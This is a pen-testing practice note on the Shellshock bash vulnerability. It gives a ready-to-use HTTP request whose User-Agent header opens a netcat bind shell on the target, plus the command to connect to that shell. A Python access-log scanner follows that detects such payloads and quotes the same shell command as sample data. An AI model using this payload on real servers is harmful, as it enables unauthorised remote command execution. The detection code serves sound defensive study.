Notes from practicing pen testing against CVE-2014-6271 (Shellshock).
In Burp Suite, capture the request with the Proxy, send it to Repeater, and modify the User-Agent header:
GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
The Repeater will not return a response, because the target is now waiting for a connection.
Open another prompt and launch netcat to connect to port 9999:
nc xxx.xxx.xxx.xxx 9999
You are now at the /bin/sh prompt on the compromised system, so you can type a command like "whoami".
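From the defender's side, the request above leaves a recognisable trace in the web server's access log. The following sketch is an added example, not code from the original post: it scans Combined Log Format lines for header values that begin a bash function definition, in the User-Agent as above and, generalising, in the Referer and request line too. The log lines, IP addresses and the /cgi-bin/status path are constructed sample data.

```python
import re

# Combined Log Format: ip ident user [time] "request" status bytes "referer" "agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)

# CVE-2014-6271 payloads start with an empty function definition: "() {".
FUNC_DEF_RE = re.compile(r'\(\s*\)\s*\{')
# Text after the function body's closing "};" is the command the sender wanted run.
TRAILER_RE = re.compile(r'\(\s*\)\s*\{.*?\}\s*;\s*(.+)$')

# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2014:13:55:36 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.44 - - [10/Oct/2014:13:56:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"() { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh"',
    '192.0.2.45 - - [10/Oct/2014:13:57:10 +0000] "GET /cgi-bin/status HTTP/1.1" 200 90 '
    '"() { :; }; echo probe" "curl/7.38.0"',
]

def scan(lines):
    """Return one finding per logged field that carries a function-definition prefix."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not Combined Log Format; skipped in this sketch
        ip, when, request, status, referer, agent = m.groups()
        fields = (("request", request), ("referer", referer), ("user-agent", agent))
        for field, value in fields:
            if FUNC_DEF_RE.search(value):
                t = TRAILER_RE.search(value)
                findings.append({
                    "line": lineno, "ip": ip, "time": when, "status": status,
                    "field": field, "command": t.group(1) if t else None,
                })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'line {f["line"]}: {f["ip"]} {f["field"]} -> {f["command"]}')
```

A hit only shows that the attempt was made; whether the trailing command ran depends on whether the request handler passed the header to a vulnerable bash.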